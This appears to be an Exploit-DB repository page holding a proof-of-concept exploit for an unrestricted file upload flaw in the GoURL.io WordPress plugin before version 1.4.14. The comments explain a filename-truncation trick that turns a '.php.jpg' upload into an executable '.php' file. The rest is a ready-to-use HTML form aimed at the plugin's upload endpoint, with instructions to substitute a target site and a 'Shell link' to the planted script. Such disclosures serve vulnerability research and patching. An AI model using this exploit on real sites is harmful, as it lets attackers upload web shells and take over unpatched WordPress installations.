6852d5abf3
5 changes to exploits/shellcodes Outlook Password Recovery 2.10 - Denial of Service Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection Jobberbase 2.0 CMS - 'jobs-in' SQL Injection WordPress Plugin GoURL.io < 1.4.14 - File Upload
37 lines
No EOL
1.2 KiB
HTML
37 lines
No EOL
1.2 KiB
HTML
<html>
|
|
<!--
|
|
|
|
GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi
|
|
CWE-434
|
|
|
|
Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
|
|
|
|
Details:
|
|
|
|
After checking file extention substring was used for file name to select first 95 letter line #5655
|
|
So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
|
|
will upload a file with .php extention in website :)
|
|
|
|
-->
|
|
|
|
<body>
|
|
|
|
<!--
|
|
|
|
Replace http://127.0.0.1/wp/ with target wordpress website
|
|
Fill id param in form action to any active download product
|
|
|
|
-->
|
|
|
|
<form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">
|
|
|
|
<input type="file" name="gourlimage2" />
|
|
<input type="submit"/>
|
|
|
|
</form>
|
|
|
|
<a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>
|
|
|
|
</body>
|
|
|
|
</html> |